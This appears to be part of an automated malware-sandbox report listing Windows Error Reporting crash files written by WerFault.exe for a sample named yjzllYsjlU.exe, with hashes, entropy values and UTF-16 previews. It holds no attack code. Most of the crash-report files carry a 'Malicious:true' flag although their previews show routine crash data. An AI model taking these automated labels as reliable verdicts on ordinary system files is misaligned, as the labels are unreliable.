                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.1059557013429178
                  Encrypted:false
                  SSDEEP:192:yEEUZOrnr0xev5jpQwZrtKVFezuiF3Z24IO8r1X:coOrn4xev5jwezuiF3Y4IO8rN
                  MD5:EB6EF576F722DFD0F8F45530504011CD
                  SHA1:32D238E83F73688DB3A86428D425104B46424AB0
                  SHA-256:2C2D989DF974A6CE14E53BD4335D46E1F55D913455510F5365FC2133781A89F0
                  SHA-512:8BA30BC2D5C89EDE7D566494A2D7DF418DF9A7CA22DA9DDAE1EE96E2F10577A85DAC1A0501D54C477B822BB68A48C5EC402E6ACF487388231A39071D873FD171
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.6.3.1.8.5.3.0.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.2.6.7.6.3.9.8.2.1.7.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.b.3.4.a.3.8.-.3.9.c.1.-.4.b.0.b.-.8.7.0.1.-.b.1.4.1.4.0.3.d.4.7.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.e.3.8.f.a.8.-.5.4.2.d.-.4.0.0.c.-.b.1.3.e.-.b.d.0.d.2.f.2.6.b.7.b.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.j.z.l.l.Y.s.j.l.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.c.-.0.0.0.1.-.0.0.1.5.-.d.7.a.e.-.5.0.7.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.0.b.e.1.8.c.d.1.2.d.f.0.a.d.5.7.8.2.3.1.c.9.b.0.1.f.c.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....T.a.r.g.e.t.A.p.p.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.0041728676184458
                  Encrypted:false
                  SSDEEP:192:yXZBVr4056rAjpQwZrtKVXzuiF3Z24IO8O1X:qzrT56rAjizuiF3Y4IO8ON
                  MD5:A273A1F989AD7D4C5FEB31CF19ECF4A8
                  SHA1:3BB80C0F12FB1EF2203DCDED3600A294FB065362
                  SHA-256:10B4D27F23EA6EC5C39E4DD7E89944356602858FECF64257BDBD525FFD897A6C
                  SHA-512:345559D0AB37E56E434655FADE7DC461D2447F2E6C34D7700FCA3B2BC6E4FE764DA90A47A301DBD7B46FC49C95B6EEFADF93F5DF74285A3D6777EFA0B7F8FC25
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.6.0.5.8.3.7.8.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.4.7.7.d.7.2.-.c.3.d.b.-.4.f.b.9.-.9.4.d.5.-.2.4.8.7.0.a.b.9.1.5.c.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.e.8.6.4.7.0.-.d.9.4.a.-.4.a.2.8.-.b.4.c.a.-.a.3.8.3.f.b.c.5.3.1.3.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.j.z.l.l.Y.s.j.l.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.c.-.0.0.0.1.-.0.0.1.5.-.d.7.a.e.-.5.0.7.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.0.b.e.1.8.c.d.1.2.d.f.0.a.d.5.7.8.2.3.1.c.9.b.0.1.f.c.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9969289202770114
                  Encrypted:false
                  SSDEEP:192:Yc0Zzr4056rAjpQwZrtKVzzuiF3Z24IO8O1X:7IzrT56rAj2zuiF3Y4IO8ON
                  MD5:A034C05883F9169558F1F965F89E7169
                  SHA1:8EF7BACA53B2EE1BE5B8732DE297A502312BB69B
                  SHA-256:D418E1BC32FB3AE1659E6B2269EBD3508D6B2AC1546FB01FABCB25E37FAA843B
                  SHA-512:AC54C8623DC9C058FC27AD53F0C5B1DDC8F38F3E101FA43F1D30CF45F4E1503EE476A7FFD69B479F1B5AB61A4F7883F94A2884197EFE3DFF07E3E3A681F726B9
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.5.9.2.5.2.0.9.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.d.1.8.c.8.0.-.6.5.0.a.-.4.e.2.f.-.9.a.c.8.-.a.6.b.b.4.1.4.3.f.d.d.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.8.5.1.b.1.6.-.9.f.3.1.-.4.1.a.9.-.9.9.5.b.-.7.e.5.2.0.c.1.c.d.5.3.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.j.z.l.l.Y.s.j.l.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.c.-.0.0.0.1.-.0.0.1.5.-.d.7.a.e.-.5.0.7.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.0.b.e.1.8.c.d.1.2.d.f.0.a.d.5.7.8.2.3.1.c.9.b.0.1.f.c.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9034873949158321
                  Encrypted:false
                  SSDEEP:192:M71IATZ5r4056rAjpQwZrHzuiF3Z24IO8O1X:o1IAV5rT56rAjhzuiF3Y4IO8ON
                  MD5:67CDE5A1F2867B96330E2BA35F27325B
                  SHA1:9DA83DA83A2C35BDD7727839EACF8103A934A42D
                  SHA-256:DC0A2734128FC9DB527C366205284DA01C207F111C35B80FDB90DDED790912E0
                  SHA-512:277427B13295F750C18A3B5C46336A3BCBCCA4134F2DD3C2D808FCED497ACF0273CF8FDB0EF8C338F3C168429FBC42C3051FCBC95C3BD1EE817FCD4AE1D5A696
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.5.5.7.9.1.6.2.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.5.4.6.b.e.1.-.8.b.6.d.-.4.9.4.7.-.8.9.7.1.-.6.4.5.2.9.f.e.b.f.b.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.0.f.9.e.0.8.-.7.1.c.b.-.4.9.6.7.-.9.6.1.7.-.9.d.e.d.e.9.d.a.6.1.f.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.j.z.l.l.Y.s.j.l.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.c.-.0.0.0.1.-.0.0.1.5.-.d.7.a.e.-.5.0.7.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.0.b.e.1.8.c.d.1.2.d.f.0.a.d.5.7.8.2.3.1.c.9.b.0.1.f.c.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9100100284352439
                  Encrypted:false
                  SSDEEP:192:1zZUr4056rAjpQwZrtdzuiF3Z24IO8O1X:3UrT56rAjJzuiF3Y4IO8ON
                  MD5:12956FA123B5F170C8DC9F33BEA51377
                  SHA1:B2A9B8CDB37DD3A1A9A3B62528DE034676646B03
                  SHA-256:0FD546CC0BC039FFB978250BFF572A4CF310B67D1A56D951AF2059F33CCDDF78
                  SHA-512:BB7635A47B157D150B3838E195902CFAC329C3642FB8759560BC8865DAECA8EC3B15B7CA23B59559011043E3E62BC72D25C90F6B61438B16BCEB82393E3672D5
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.5.7.1.6.6.2.3.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.f.6.9.c.b.d.-.7.c.a.2.-.4.7.9.9.-.b.4.3.2.-.e.6.e.d.1.8.f.d.5.5.7.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.6.2.7.b.8.8.-.9.0.c.d.-.4.d.f.0.-.b.9.b.0.-.6.a.3.0.f.4.9.6.d.d.b.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.j.z.l.l.Y.s.j.l.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.c.-.0.0.0.1.-.0.0.1.5.-.d.7.a.e.-.5.0.7.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.0.b.e.1.8.c.d.1.2.d.f.0.a.d.5.7.8.2.3.1.c.9.b.0.1.f.c.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9035358952318105
                  Encrypted:false
                  SSDEEP:192:fZ2vr4056rAjpQwZrHzuiF3Z24IO8O1X:R2vrT56rAjhzuiF3Y4IO8ON
                  MD5:D757C7F761FA99E69131F58B6C4ECBE5
                  SHA1:26E634A768E745A2C601C0324A501401A79C30DA
                  SHA-256:53ACC3A58FCB9611B5097F060D572929C9A89E9916753452682CC5880FEB80EF
                  SHA-512:53161074AA995D9559F546B5132D04AF965D576CECB298EB5BA1A8D15C54EC31DEBE8F147619FCD1DE5495FAF317F5CFCEB41E17A65B53392E6F767623FF7ACF
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.5.6.4.2.9.8.1.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.f.5.1.9.2.5.-.8.a.a.6.-.4.c.1.7.-.b.b.4.b.-.f.c.3.6.7.a.4.1.2.5.6.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.c.3.8.1.9.0.-.e.7.d.6.-.4.5.6.b.-.8.f.4.3.-.d.5.c.d.7.6.e.0.a.7.5.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.j.z.l.l.Y.s.j.l.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.c.-.0.0.0.1.-.0.0.1.5.-.d.7.a.e.-.5.0.7.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.0.b.e.1.8.c.d.1.2.d.f.0.a.d.5.7.8.2.3.1.c.9.b.0.1.f.c.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8447135210207714
                  Encrypted:false
                  SSDEEP:96:Gj9ZWs1hqwoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf3ZFEOyKZoxm9nFEb6:o9ZWr4056rAjp5zuiF3Z24IO8O1X
                  MD5:F4282C66D423FED0CDA83E7C5F59C667
                  SHA1:AA334C74223A523111744CA3BB9AEF13327E6F5C
                  SHA-256:04F7601DF561E5312DAFA8103BB1BDA8A50971CA5132B57A22038499373650C6
                  SHA-512:6B7CBFB705384FC7503FE7E884BA941C710EC0BEFFD86294CBB84A8E5E5E78F9B5D00F0DBC911F60844462C19F3FF22C9C0CE0D73F3C29F7330B5D4E482A719E
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.5.3.5.3.7.6.3.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.9.8.1.8.d.2.-.3.f.1.0.-.4.5.8.1.-.a.d.2.e.-.9.1.8.f.8.f.2.e.d.e.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.6.4.3.2.2.8.-.2.5.d.a.-.4.a.9.2.-.b.8.6.1.-.8.b.4.c.e.4.3.9.5.6.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.j.z.l.l.Y.s.j.l.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.c.-.0.0.0.1.-.0.0.1.5.-.d.7.a.e.-.5.0.7.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.0.b.e.1.8.c.d.1.2.d.f.0.a.d.5.7.8.2.3.1.c.9.b.0.1.f.c.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.0109715645777944
                  Encrypted:false
                  SSDEEP:192:5sZRr4056rAjpQwZrtKVHzuiF3Z24IO8O1X:5gRrT56rAjKzuiF3Y4IO8ON
                  MD5:C9524C6655DC3C787BD9C3F9F0B716D7
                  SHA1:3C273F83305785FBEF77413F5B4FE3B5E59B42E5
                  SHA-256:3E7CFE0F4A9F84DF3BDCE9D3FF952533AA6811FBE4B5EEB861F05EEBDF663B39
                  SHA-512:8F7F7C691BB12A2F9E23EE367849BED1970A00F1A4434F6417D9BD61251DF3911ED2241CC3792C5532C38B3E1E582DB2F63B428A6BB9ED53AFB9F403BC9FC693
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.6.1.3.8.3.6.6.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.c.c.5.c.a.9.-.d.1.e.1.-.4.9.d.3.-.b.3.9.b.-.4.c.5.1.6.6.0.d.8.b.a.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.c.2.c.4.3.a.-.4.d.9.9.-.4.9.7.9.-.9.f.4.1.-.8.9.8.b.4.f.4.e.f.9.a.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.j.z.l.l.Y.s.j.l.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.c.-.0.0.0.1.-.0.0.1.5.-.d.7.a.e.-.5.0.7.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.0.b.e.1.8.c.d.1.2.d.f.0.a.d.5.7.8.2.3.1.c.9.b.0.1.f.c.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:modified
                  Size (bytes):65536
                  Entropy (8bit):0.9095130655151291
                  Encrypted:false
                  SSDEEP:192:HYZzr4056rAjpQwZrtdzuiF3Z24IO8O1X:H8zrT56rAjJzuiF3Y4IO8ON
                  MD5:7E9A445C0688627D21FD153F06ED5EB5
                  SHA1:91041371C59A50AFA043A44EB30A130328EC4A93
                  SHA-256:A94AE12781DD155591FC5DDC5326D67FA114A6134D6F70815229135347889D44
                  SHA-512:F691B0DD5DDF4A399C8FB0B84463D84AF7F83281FFEE58E763070DF7BADBF2C8866449309FE364780A45FF9C4B890BC4D5CE380A61D963759F190B5F874833CF
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.5.8.4.0.1.0.9.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.4.2.4.8.d.9.-.e.f.e.b.-.4.7.9.e.-.a.4.3.2.-.9.e.1.c.1.3.4.e.1.4.f.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.7.5.4.a.7.5.-.0.6.c.2.-.4.d.d.5.-.a.f.a.a.-.c.5.9.e.e.e.6.d.8.d.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.j.z.l.l.Y.s.j.l.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.c.-.0.0.0.1.-.0.0.1.5.-.d.7.a.e.-.5.0.7.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.0.b.e.1.8.c.d.1.2.d.f.0.a.d.5.7.8.2.3.1.c.9.b.0.1.f.c.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.87810125457381
                  Encrypted:false
                  SSDEEP:96:K7Zas1hqwoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf3ZFEOyKZoxm9nFEb8O:8Zar4056rAjpQhzuiF3Z24IO8O1X
                  MD5:7248553C5DC86F2E970480639A95DD0F
                  SHA1:9424969D470716FE03855A41A581F7D96E169876
                  SHA-256:B9D1B69E4484CC1787BBC8EAEBBC7FC7EBFADDC692540B14F82E759F854C362B
                  SHA-512:AAC5DC6B17270CC1F55A0CEAF788EF0992B0C24C751AFA70DC6DE01DAD9607DA69DF9AD27044969CE13FD62A0390DA9B9ED6E1AD0EEA3E5234C4B4A2007C6A55
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.2.6.7.5.4.5.4.7.5.7.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.8.1.b.c.4.e.-.9.0.c.6.-.4.c.d.b.-.9.f.f.0.-.7.1.8.1.4.e.0.2.1.a.c.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.0.0.e.f.4.f.-.f.b.f.2.-.4.6.0.4.-.8.e.4.9.-.6.6.9.c.e.b.1.d.c.7.4.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.j.z.l.l.Y.s.j.l.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.c.-.0.0.0.1.-.0.0.1.5.-.d.7.a.e.-.5.0.7.7.2.5.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.0.b.e.1.8.c.d.1.2.d.f.0.a.d.5.7.8.2.3.1.c.9.b.0.1.f.c.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.f.a.6.5.d.e.4.b.b.e.a.7.b.f.1.6.3.2.2.8.8.2.e.b.0.c.b.b.0.9.0.9.e.f.c.f.0.d.b.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.y.j.z.l.l.Y.s.j.l.U...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8412
                  Entropy (8bit):3.7044575534079325
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJn66I9dre6Y2D6SUEVl/ggmfGUpBT89bNQsfXOvm:R6lXJ66I9o6Y3SUEVKgmfGnNjfX
                  MD5:FE68921FB21F81BA85E63353E173F339
                  SHA1:428880BCCEA70A9BF5449748CCD851A75B41441B
                  SHA-256:E1D7B296F015A42F8D836A415D5FE4A5FF711B415559AE8933378311A2090A75
                  SHA-512:DE7AE6CE78C9E77CD38DEC63C8687059D1355733BCC7D4707C8E1C15D38BED381464129A78DCDA3488DDE1F22CA99A6416BD5967B69AFCFD024217DFA253219D
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.1.6.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
